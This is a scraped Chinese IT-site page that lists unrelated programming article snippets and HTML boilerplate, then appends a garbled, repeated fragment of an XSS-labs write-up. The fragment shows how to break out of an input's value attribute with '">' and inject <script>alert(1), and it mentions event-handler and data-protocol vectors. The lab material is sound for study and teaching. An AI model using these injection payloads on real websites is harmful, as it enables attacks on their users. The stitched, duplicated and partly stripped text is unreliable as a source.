运行结果 
29949 
&nbsp;  特殊变量列表   变量 含义   $0 当前脚本的文件名   $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个</div>
                                </li>
                                <li><a href="/article/2585.htm"
                                       title="程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!" target="_blank">程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/unix/1.htm">unix</a>
                                    <div>翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 
 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原</div>
                                </li>
                                <li><a href="/article/2712.htm"
                                       title="android Activity间List传值" target="_blank">android Activity间List传值</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>第一个Activity： 
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a</div>
                                </li>
                                <li><a href="/article/2839.htm"
                                       title="tomcat 设置java虚拟机内存" target="_blank">tomcat 设置java虚拟机内存</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tomcat+%E5%86%85%E5%AD%98%E8%AE%BE%E7%BD%AE/1.htm">tomcat 内存设置</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2117772 
http://eksliang.iteye.com/ 
常见的内存溢出有以下两种: 
java.lang.OutOfMemoryError: PermGen space  
java.lang.OutOfMemoryError: Java heap space 
&nbsp; 
------------</div>
                                </li>
                                <li><a href="/article/2966.htm"
                                       title="Android 数据库事务处理" target="_blank">Android 数据库事务处理</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事</div>
                                </li>
                                <li><a href="/article/3093.htm"
                                       title="Java 打开浏览器" target="_blank">Java 打开浏览器</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E7%BD%91%E5%9D%80/1.htm">打开网址</a><a class="tag" taget="_blank" href="/search/open%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">open浏览器</a><a class="tag" taget="_blank" href="/search/open+browser/1.htm">open browser</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80url/1.htm">打开url</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">打开浏览器</a>
                                    <div>使用java 语言如何打开浏览器呢? 
我们先研究下在cmd窗口中,如何打开网址 
使用IE 打开 
D:\software\bin&gt;cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 
使用火狐打开 
D:\software\bin&gt;cmd /c start firefox http://hw1287789</div>
                                </li>
                                <li><a href="/article/3220.htm"
                                       title="ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件" target="_blank">ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a><a class="tag" taget="_blank" href="/search/google+api/1.htm">google api</a><a class="tag" taget="_blank" href="/search/chrome%E6%8F%92%E4%BB%B6/1.htm">chrome插件</a>
                                    <div>Chrome Web Store 安装地址：&nbsp;https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 
 
 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧</div>
                                </li>
                                <li><a href="/article/3347.htm"
                                       title="进程VS.线程" target="_blank">进程VS.线程</a>
                                    <span class="text-muted">m635674608</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a>
                                    <div>资料来源： 
http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点： 
多进程模式最大</div>
                                </li>
                                <li><a href="/article/3474.htm"
                                       title="Linux下安装MemCached" target="_blank">Linux下安装MemCached</a>
                                    <span class="text-muted">字符串</span>
<a class="tag" taget="_blank" href="/search/memcached/1.htm">memcached</a>
                                    <div>前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n</div>
                                </li>
                                <li><a href="/article/3601.htm"
                                       title="java设计模式之--jdk动态代理（实现aop编程）" target="_blank">java设计模式之--jdk动态代理（实现aop编程）</a>
                                    <span class="text-muted">Supanccy2013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>&nbsp;&nbsp;&nbsp; 与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 
&</div>
                                </li>
                                <li><a href="/article/3728.htm"
                                       title="Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持" target="_blank">Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>2.1 默认方法(default method) 
 
 java8引入了一个default medthod; 
 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 
 使用default关键字 
 Spring 4.2支持加载在默认方法里声明的bean 
  
2.2 
 
 将要被声明成bean的类 
  
public class DemoService {
    </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1

Level2 【参数】

"> 就会实现xss注入
所以payload 就是

`">`

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1alert(1)

Level2 【参数】

标签</h3> <pre><code>value="1"> 如果我们自己将其闭合呢 我们输入 "> 就会变为 value="">"> 这里 其实就是 value=""> "> 然后我们构造恶意代码 value=""><script>alert(1) "> 就会实现xss注入 所以payload 就是 ">alert(1)

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

欢迎用户test1

"> 就会实现xss注入
所以payload 就是

`">`